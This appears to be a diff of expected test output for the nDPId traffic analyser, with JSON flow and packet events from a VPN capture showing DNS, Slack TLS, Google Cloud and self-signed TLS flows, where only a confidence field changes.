00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569687251230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1569687251230,"pkt":"NDY7z3UoLH6BsEqhCABFAACPAABAADYRoeRLS0xMCgAA4wA11kMAe\/FSpheBgwABAAAAAQAABXByaW50BnZpYXNhdANjb20AAAEAAcASAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwBkAAAABAAAcIAAAA4QAEnUAAAFRgA=="} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569687255989,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687255989,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3enMAAP8RnsgKAADjS0tMTOMrADUAI5+UjycBAAABAAAAAAAABXNsYWNrA2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": 
{"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} 
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} 
@@ -129,47 +129,47 @@ 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAD7GIEORo7ICABGAAAgpGYAAAEClKEKAADV4AAA+5QEAAAWAAkE4AAA+w=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01539{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 
